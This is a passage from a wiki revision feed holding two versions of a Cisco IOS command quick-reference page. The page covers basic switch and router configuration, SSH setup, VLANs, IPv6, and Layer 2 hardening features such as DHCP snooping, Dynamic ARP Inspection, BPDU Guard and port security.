no ipv6 address 2001:DB8:CAFE:1::1/64&lt;br /&gt;
no ipv6 address&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== IPv6 ND Other-Config Flag ===&lt;br /&gt;
The `ipv6 nd other-config-flag` command sets the &amp;quot;Other Configuration&amp;quot; flag in IPv6 Neighbor Discovery (ND) messages.  &lt;br /&gt;
- When enabled, it signals to IPv6 hosts that they should obtain additional configuration information (such as DNS server addresses) via DHCPv6, even if they have a stateless autoconfigured address.&lt;br /&gt;
&lt;br /&gt;
ipv6 nd other-config-flag&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== Spanning Tree ==&lt;br /&gt;
&lt;br /&gt;
=== Enable PortFast on an interface ===&lt;br /&gt;
Use PortFast on edge/access ports that connect to end devices.&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/1&lt;br /&gt;
  spanning-tree portfast&lt;br /&gt;
&lt;br /&gt;
=== Enable PortFast globally ===&lt;br /&gt;
Enables PortFast on all access ports.&lt;br /&gt;
&lt;br /&gt;
 spanning-tree portfast default&lt;br /&gt;
&lt;br /&gt;
=== Enable PortFast on a trunk (use with caution) ===&lt;br /&gt;
Only use when the trunk connects to a single end device (not another switch).&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/1&lt;br /&gt;
  spanning-tree portfast trunk&lt;br /&gt;
&lt;br /&gt;
=== Verify PortFast status ===&lt;br /&gt;
&lt;br /&gt;
 show spanning-tree interface GigabitEthernet0/1 detail&lt;br /&gt;
&lt;br /&gt;
=== Disable PortFast on an interface ===&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/1&lt;br /&gt;
  no spanning-tree portfast&lt;br /&gt;
&lt;br /&gt;
=== Best Practice: Enable BPDU Guard with PortFast ===&lt;br /&gt;
Shuts down the port if a BPDU is received, protecting against loops.&lt;br /&gt;
&lt;br /&gt;
Per interface:&lt;br /&gt;
 interface GigabitEthernet0/1&lt;br /&gt;
  spanning-tree portfast&lt;br /&gt;
  spanning-tree bpduguard enable&lt;br /&gt;
&lt;br /&gt;
Globally:&lt;br /&gt;
 spanning-tree portfast default&lt;br /&gt;
 spanning-tree bpduguard default&lt;br /&gt;
&lt;br /&gt;
=== Notes ===&lt;br /&gt;
* Do &#039;&#039;&#039;not&#039;&#039;&#039; enable PortFast on ports connected to other switches&lt;br /&gt;
* Recommended for access/edge ports&lt;br /&gt;
* Incorrect use can cause Layer 2 loops&lt;br /&gt;
&lt;br /&gt;
== DHCP Snooping ==&lt;br /&gt;
&lt;br /&gt;
=== Enable DHCP Snooping globally ===&lt;br /&gt;
Enable DHCP Snooping for the switch.&lt;br /&gt;
&lt;br /&gt;
 ip dhcp snooping&lt;br /&gt;
&lt;br /&gt;
=== Enable DHCP Snooping on a VLAN ===&lt;br /&gt;
DHCP Snooping only operates on specified VLANs.&lt;br /&gt;
&lt;br /&gt;
 ip dhcp snooping vlan 10&lt;br /&gt;
 ip dhcp snooping vlan 20&lt;br /&gt;
&lt;br /&gt;
=== Configure trusted interfaces ===&lt;br /&gt;
Mark uplinks or ports connected to legitimate DHCP servers as trusted.&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/1&lt;br /&gt;
  ip dhcp snooping trust&lt;br /&gt;
&lt;br /&gt;
=== Untrusted interfaces (default) ===&lt;br /&gt;
Access ports are untrusted by default. DHCP server responses are blocked.&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/2&lt;br /&gt;
  no ip dhcp snooping trust&lt;br /&gt;
&lt;br /&gt;
=== Configure DHCP Snooping rate limiting ===&lt;br /&gt;
Protect against DHCP starvation attacks. Limits to 15 DHCP packets per second, will mark port as violating otherwise.&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/2&lt;br /&gt;
  ip dhcp snooping limit rate 15&lt;br /&gt;
&lt;br /&gt;
=== Verify DHCP Snooping status ===&lt;br /&gt;
&lt;br /&gt;
 show ip dhcp snooping&lt;br /&gt;
 show ip dhcp snooping binding&lt;br /&gt;
&lt;br /&gt;
=== Disable DHCP Snooping ===&lt;br /&gt;
&lt;br /&gt;
 no ip dhcp snooping&lt;br /&gt;
 no ip dhcp snooping vlan 10&lt;br /&gt;
&lt;br /&gt;
=== Notes ===&lt;br /&gt;
* Only trusted ports can send DHCP server messages&lt;br /&gt;
* Access ports should remain untrusted&lt;br /&gt;
* Commonly used with &#039;&#039;&#039;Dynamic ARP Inspection&#039;&#039;&#039; and &#039;&#039;&#039;IP Source Guard&#039;&#039;&#039;&lt;br /&gt;
* Requires correct VLAN configuration to function properly&lt;br /&gt;
&lt;br /&gt;
== Dynamic ARP Inspection (DAI) ==&lt;br /&gt;
&lt;br /&gt;
=== Enable DAI globally ===&lt;br /&gt;
Dynamic ARP Inspection requires DHCP Snooping to be enabled.&lt;br /&gt;
&lt;br /&gt;
 ip arp inspection&lt;br /&gt;
&lt;br /&gt;
=== Enable DAI on a VLAN ===&lt;br /&gt;
Specify which VLANs should be protected.&lt;br /&gt;
&lt;br /&gt;
 ip arp inspection vlan 10&lt;br /&gt;
 ip arp inspection vlan 20&lt;br /&gt;
&lt;br /&gt;
=== Configure trusted interfaces ===&lt;br /&gt;
Trust uplinks and ports connected to other switches or routers.&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/1&lt;br /&gt;
  ip arp inspection trust&lt;br /&gt;
&lt;br /&gt;
=== Untrusted interfaces (default) ===&lt;br /&gt;
Access ports are untrusted by default. Invalid ARP packets are dropped.&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/2&lt;br /&gt;
  no ip arp inspection trust&lt;br /&gt;
&lt;br /&gt;
=== Configure ARP rate limiting ===&lt;br /&gt;
Protect against ARP flooding attacks.&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/2&lt;br /&gt;
  ip arp inspection limit rate 15&lt;br /&gt;
&lt;br /&gt;
=== Verify DAI status ===&lt;br /&gt;
&lt;br /&gt;
 show ip arp inspection&lt;br /&gt;
 show ip arp inspection vlan&lt;br /&gt;
 show ip arp inspection interfaces&lt;br /&gt;
&lt;br /&gt;
=== Disable DAI ===&lt;br /&gt;
&lt;br /&gt;
 no ip arp inspection&lt;br /&gt;
 no ip arp inspection vlan 10&lt;br /&gt;
&lt;br /&gt;
=== Notes ===&lt;br /&gt;
* Requires &#039;&#039;&#039;DHCP Snooping&#039;&#039;&#039; to build the ARP binding table&lt;br /&gt;
* Only trusted ports can send unlimited ARP replies&lt;br /&gt;
* Access ports should remain untrusted&lt;br /&gt;
* Commonly deployed with &#039;&#039;&#039;PortFast + BPDU Guard&#039;&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
== Port Security ==&lt;br /&gt;
&lt;br /&gt;
=== Activate Port Security on an interface ===&lt;br /&gt;
The port cannot be a dynamic port:&lt;br /&gt;
 switchport mode access&lt;br /&gt;
Enable Port Security&lt;br /&gt;
 switchport port-security&lt;br /&gt;
&lt;br /&gt;
=== Set the maximum number of mac addresses that can be used on that port ===&lt;br /&gt;
 switchport port-security maximum 1&lt;br /&gt;
&lt;br /&gt;
=== Whitelist a specific mac address ===&lt;br /&gt;
 switchport port-security mac-address 0001.6311.E7BC&lt;br /&gt;
&lt;br /&gt;
=== Enable sticky mode to automatically learn mac addresses ===&lt;br /&gt;
 switchport port-security mac-address sticky&lt;br /&gt;
&lt;br /&gt;
=== Port Security Violation Modes ===&lt;br /&gt;
==== Protect ====&lt;br /&gt;
Silently drops packets from unknown MAC addresses while keeping the port up and generating no alerts.&lt;br /&gt;
 switchport port-security violation protect&lt;br /&gt;
&lt;br /&gt;
==== Restrict ====&lt;br /&gt;
Drops packets from unknown MAC addresses and logs the violation while incrementing the security counter.&lt;br /&gt;
 switchport port-security violation restrict&lt;br /&gt;
&lt;br /&gt;
==== Shutdown ====&lt;br /&gt;
Immediately disables the port when an unknown MAC address is detected, placing it into an error-disabled state.&lt;br /&gt;
 switchport port-security violation shutdown&lt;br /&gt;
&lt;br /&gt;
=== Port Security Aging ===&lt;br /&gt;
==== Enable static aging on an interface ====&lt;br /&gt;
 switchport port-security aging static&lt;br /&gt;
&lt;br /&gt;
==== Enable timed aging on an interface (5 minutes) ====&lt;br /&gt;
 switchport port-security aging time 5&lt;/div&gt;</summary>
		<author><name>50.220.241.211</name></author>
	</entry>
	<entry>
		<id>https://wiki.luccapirovano.com/index.php?title=Cisco_Commands&amp;diff=1070</id>
		<title>Cisco Commands</title>
		<link rel="alternate" type="text/html" href="https://wiki.luccapirovano.com/index.php?title=Cisco_Commands&amp;diff=1070"/>
		<updated>2026-02-04T22:13:14Z</updated>

		<summary type="html">&lt;p&gt;50.220.241.211: /* IPv6 Interface Configuration */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;= Cisco IOS Command Reference =&lt;br /&gt;
&lt;br /&gt;
A quick-reference guide for common Cisco IOS commands on switches and routers.&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== System &amp;amp; Routing Basics ==&lt;br /&gt;
&lt;br /&gt;
=== Enable IPv4 Routing (Layer 3 Switches) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ip routing&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Enable IPv6 Routing (Routers) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ipv6 unicast-routing&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== Device &amp;amp; System Information ==&lt;br /&gt;
&lt;br /&gt;
=== Show MAC Address Table ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show mac address-table&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Show OS and Device Version ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show version&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Show Logged-in Users ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show users&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Show Files ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
dir&lt;br /&gt;
dir nvram:&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== Configuration Files ==&lt;br /&gt;
&lt;br /&gt;
=== Show Configurations ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show running-config&lt;br /&gt;
show startup-config&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Show Interface Config ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show run interface g0/0&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Filter Running Config (grep-like) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show run | include {searchterm}&lt;br /&gt;
show run | begin {searchterm}&lt;br /&gt;
show run | section {section-name}&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Save Running Config ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
copy running-config startup-config&lt;br /&gt;
copy run start&lt;br /&gt;
wr&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== User Privileges &amp;amp; Security ==&lt;br /&gt;
&lt;br /&gt;
=== Enter Privileged Mode ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
enable&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Set Encrypted Enable Password ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
enable secret ThisisaSecret&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Encrypt Plaintext Passwords (Weak Encryption)  ===&lt;br /&gt;
You can decrypt these with publicly available tools like https://keydecryptor.com/decryption-tools/cisco7&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
service password-encryption&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== Interface &amp;amp; Network Status ==&lt;br /&gt;
&lt;br /&gt;
=== Interface IP Summary ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show ip interface brief&lt;br /&gt;
show ipv6 interface brief&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Interface IP Summary (filtered to only interfaces with IPs) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show ip interface brief | exclude unassigned&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
=== Routing Table ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show ip route&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== VLAN &amp;amp; Switching ==&lt;br /&gt;
&lt;br /&gt;
=== Show VLANs ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show vlan brief&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Show Interface VLAN Details ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show interface g0/1 switchport&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Show Trunk Interfaces ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show int trunk&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Clear Tables ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
clear mac address-table&lt;br /&gt;
clear arp-cache&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== Telnet &amp;amp; Remote Access ==&lt;br /&gt;
&lt;br /&gt;
=== Connect via Telnet ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
connect {DeviceName}&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Show Hosts &amp;amp; Sessions ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show hosts&lt;br /&gt;
show sessions&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Disconnect Session ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
disconnect {DeviceName}&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Suspend Active Session ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Ctrl+Shift+6, then x&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== SSH Configuration ==&lt;br /&gt;
&lt;br /&gt;
=== Basic SSH Setup ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ip domain-name cisco.com&lt;br /&gt;
crypto key generate rsa&lt;br /&gt;
ip ssh version 2&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Remove RSA Keys ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
crypto key zeroize rsa&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Create Local User ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
username admin secret ccna&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Set Default Gateway ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ip default-gateway 192.168.10.1&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Enable SSH on VTY Lines ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
line vty 0 15&lt;br /&gt;
 transport input ssh&lt;br /&gt;
 login local&lt;br /&gt;
 exit&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== Global Configuration Mode ==&lt;br /&gt;
&lt;br /&gt;
=== Enter Global Config ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
configure terminal&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Disable DNS Lookup on Typos ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
no ip domain-lookup&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Set MOTD Banner ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
banner motd MESSAGEHERE&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Set Hostname ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
hostname HOSTNAME&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== Line Configuration ==&lt;br /&gt;
&lt;br /&gt;
=== Console Line ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
line con 0&lt;br /&gt;
 password itsasecret&lt;br /&gt;
 login&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== VTY Lines ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
line vty 0 15&lt;br /&gt;
 password itsasecret&lt;br /&gt;
 login&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== Interface Configuration ==&lt;br /&gt;
&lt;br /&gt;
=== Interface Selection ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
interface vlan 1&lt;br /&gt;
interface fa0/1&lt;br /&gt;
interface range fa0/2-3&lt;br /&gt;
interface range fa0/2-3,g0/1&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Enable Interface ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
no shutdown&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Assign IPv4 Address ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ip address 192.168.0.1 255.255.255.0&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== VLAN Configuration ==&lt;br /&gt;
&lt;br /&gt;
=== Create / Configure VLAN ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
vlan 10&lt;br /&gt;
 name MyAwesomeVlan&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== Switchport Configuration ==&lt;br /&gt;
&lt;br /&gt;
=== Access Port ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
switchport mode access&lt;br /&gt;
switchport access vlan 10&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Trunk Port ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
switchport trunk encapsulation dot1q&lt;br /&gt;
switchport mode trunk&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Trunk VLAN Settings ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
switchport trunk allowed vlan 10,20,33,99&lt;br /&gt;
switchport trunk native vlan 99&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== IPv6 Interface Configuration ==&lt;br /&gt;
&lt;br /&gt;
=== Assign IPv6 Address ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ipv6 address 2001:DB8:CAFE:1::1/64&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Assign Link-Local Address ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ipv6 address fe80::1 link-local&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Remove IPv6 Addresses ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
no ipv6 address 2001:DB8:CAFE:1::1/64&lt;br /&gt;
no ipv6 address&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== IPv6 ND Other-Config Flag ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ipv6 nd other-config-flag&lt;br /&gt;
no ipv6 nd other-config-flag&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
````Description:````&lt;br /&gt;
The `ipv6 nd other-config-flag` command sets the &amp;quot;Other Configuration&amp;quot; flag in IPv6 Neighbor Discovery (ND) messages.  &lt;br /&gt;
- When enabled, it signals to IPv6 hosts that they should obtain additional configuration information (such as DNS server addresses) via DHCPv6, even if they have a stateless autoconfigured address.  &lt;br /&gt;
- Disabling it (`no ipv6 nd other-config-flag`) stops advertising this flag in ND messages.&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== Spanning Tree ==&lt;br /&gt;
&lt;br /&gt;
=== Enable PortFast on an interface ===&lt;br /&gt;
Use PortFast on edge/access ports that connect to end devices.&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/1&lt;br /&gt;
  spanning-tree portfast&lt;br /&gt;
&lt;br /&gt;
=== Enable PortFast globally ===&lt;br /&gt;
Enables PortFast on all access ports.&lt;br /&gt;
&lt;br /&gt;
 spanning-tree portfast default&lt;br /&gt;
&lt;br /&gt;
=== Enable PortFast on a trunk (use with caution) ===&lt;br /&gt;
Only use when the trunk connects to a single end device (not another switch).&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/1&lt;br /&gt;
  spanning-tree portfast trunk&lt;br /&gt;
&lt;br /&gt;
=== Verify PortFast status ===&lt;br /&gt;
&lt;br /&gt;
 show spanning-tree interface GigabitEthernet0/1 detail&lt;br /&gt;
&lt;br /&gt;
=== Disable PortFast on an interface ===&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/1&lt;br /&gt;
  no spanning-tree portfast&lt;br /&gt;
&lt;br /&gt;
=== Best Practice: Enable BPDU Guard with PortFast ===&lt;br /&gt;
Shuts down the port if a BPDU is received, protecting against loops.&lt;br /&gt;
&lt;br /&gt;
Per interface:&lt;br /&gt;
 interface GigabitEthernet0/1&lt;br /&gt;
  spanning-tree portfast&lt;br /&gt;
  spanning-tree bpduguard enable&lt;br /&gt;
&lt;br /&gt;
Globally:&lt;br /&gt;
 spanning-tree portfast default&lt;br /&gt;
 spanning-tree bpduguard default&lt;br /&gt;
&lt;br /&gt;
=== Notes ===&lt;br /&gt;
* Do &#039;&#039;&#039;not&#039;&#039;&#039; enable PortFast on ports connected to other switches&lt;br /&gt;
* Recommended for access/edge ports&lt;br /&gt;
* Incorrect use can cause Layer 2 loops&lt;br /&gt;
&lt;br /&gt;
== DHCP Snooping ==&lt;br /&gt;
&lt;br /&gt;
=== Enable DHCP Snooping globally ===&lt;br /&gt;
Enable DHCP Snooping for the switch.&lt;br /&gt;
&lt;br /&gt;
 ip dhcp snooping&lt;br /&gt;
&lt;br /&gt;
=== Enable DHCP Snooping on a VLAN ===&lt;br /&gt;
DHCP Snooping only operates on specified VLANs.&lt;br /&gt;
&lt;br /&gt;
 ip dhcp snooping vlan 10&lt;br /&gt;
 ip dhcp snooping vlan 20&lt;br /&gt;
&lt;br /&gt;
=== Configure trusted interfaces ===&lt;br /&gt;
Mark uplinks or ports connected to legitimate DHCP servers as trusted.&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/1&lt;br /&gt;
  ip dhcp snooping trust&lt;br /&gt;
&lt;br /&gt;
=== Untrusted interfaces (default) ===&lt;br /&gt;
Access ports are untrusted by default. DHCP server responses are blocked.&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/2&lt;br /&gt;
  no ip dhcp snooping trust&lt;br /&gt;
&lt;br /&gt;
=== Configure DHCP Snooping rate limiting ===&lt;br /&gt;
Protect against DHCP starvation attacks. Limits to 15 DHCP packets per second, will mark port as violating otherwise.&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/2&lt;br /&gt;
  ip dhcp snooping limit rate 15&lt;br /&gt;
&lt;br /&gt;
=== Verify DHCP Snooping status ===&lt;br /&gt;
&lt;br /&gt;
 show ip dhcp snooping&lt;br /&gt;
 show ip dhcp snooping binding&lt;br /&gt;
&lt;br /&gt;
=== Disable DHCP Snooping ===&lt;br /&gt;
&lt;br /&gt;
 no ip dhcp snooping&lt;br /&gt;
 no ip dhcp snooping vlan 10&lt;br /&gt;
&lt;br /&gt;
=== Notes ===&lt;br /&gt;
* Only trusted ports can send DHCP server messages&lt;br /&gt;
* Access ports should remain untrusted&lt;br /&gt;
* Commonly used with &#039;&#039;&#039;Dynamic ARP Inspection&#039;&#039;&#039; and &#039;&#039;&#039;IP Source Guard&#039;&#039;&#039;&lt;br /&gt;
* Requires correct VLAN configuration to function properly&lt;br /&gt;
&lt;br /&gt;
== Dynamic ARP Inspection (DAI) ==&lt;br /&gt;
&lt;br /&gt;
=== Enable DAI globally ===&lt;br /&gt;
Dynamic ARP Inspection requires DHCP Snooping to be enabled.&lt;br /&gt;
&lt;br /&gt;
 ip arp inspection&lt;br /&gt;
&lt;br /&gt;
=== Enable DAI on a VLAN ===&lt;br /&gt;
Specify which VLANs should be protected.&lt;br /&gt;
&lt;br /&gt;
 ip arp inspection vlan 10&lt;br /&gt;
 ip arp inspection vlan 20&lt;br /&gt;
&lt;br /&gt;
=== Configure trusted interfaces ===&lt;br /&gt;
Trust uplinks and ports connected to other switches or routers.&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/1&lt;br /&gt;
  ip arp inspection trust&lt;br /&gt;
&lt;br /&gt;
=== Untrusted interfaces (default) ===&lt;br /&gt;
Access ports are untrusted by default. Invalid ARP packets are dropped.&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/2&lt;br /&gt;
  no ip arp inspection trust&lt;br /&gt;
&lt;br /&gt;
=== Configure ARP rate limiting ===&lt;br /&gt;
Protect against ARP flooding attacks.&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/2&lt;br /&gt;
  ip arp inspection limit rate 15&lt;br /&gt;
&lt;br /&gt;
=== Verify DAI status ===&lt;br /&gt;
&lt;br /&gt;
 show ip arp inspection&lt;br /&gt;
 show ip arp inspection vlan&lt;br /&gt;
 show ip arp inspection interfaces&lt;br /&gt;
&lt;br /&gt;
=== Disable DAI ===&lt;br /&gt;
&lt;br /&gt;
 no ip arp inspection&lt;br /&gt;
 no ip arp inspection vlan 10&lt;br /&gt;
&lt;br /&gt;
=== Notes ===&lt;br /&gt;
* Requires &#039;&#039;&#039;DHCP Snooping&#039;&#039;&#039; to build the ARP binding table&lt;br /&gt;
* Only trusted ports can send unlimited ARP replies&lt;br /&gt;
* Access ports should remain untrusted&lt;br /&gt;
* Commonly deployed with &#039;&#039;&#039;PortFast + BPDU Guard&#039;&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
== Port Security ==&lt;br /&gt;
&lt;br /&gt;
=== Activate Port Security on an interface ===&lt;br /&gt;
The port cannot be a dynamic port:&lt;br /&gt;
 switchport mode access&lt;br /&gt;
Enable Port Security&lt;br /&gt;
 switchport port-security&lt;br /&gt;
&lt;br /&gt;
=== Set the maximum number of mac addresses that can be used on that port ===&lt;br /&gt;
 switchport port-security maximum 1&lt;br /&gt;
&lt;br /&gt;
=== Whitelist a specific mac address ===&lt;br /&gt;
 switchport port-security mac-address 0001.6311.E7BC&lt;br /&gt;
&lt;br /&gt;
=== Enable sticky mode to automatically learn mac addresses ===&lt;br /&gt;
 switchport port-security mac-address sticky&lt;br /&gt;
&lt;br /&gt;
=== Port Security Violation Modes ===&lt;br /&gt;
==== Protect ====&lt;br /&gt;
Silently drops packets from unknown MAC addresses while keeping the port up and generating no alerts.&lt;br /&gt;
 switchport port-security violation protect&lt;br /&gt;
&lt;br /&gt;
==== Restrict ====&lt;br /&gt;
Drops packets from unknown MAC addresses and logs the violation while incrementing the security counter.&lt;br /&gt;
 switchport port-security violation restrict&lt;br /&gt;
&lt;br /&gt;
==== Shutdown ====&lt;br /&gt;
Immediately disables the port when an unknown MAC address is detected, placing it into an error-disabled state.&lt;br /&gt;
 switchport port-security violation shutdown&lt;br /&gt;
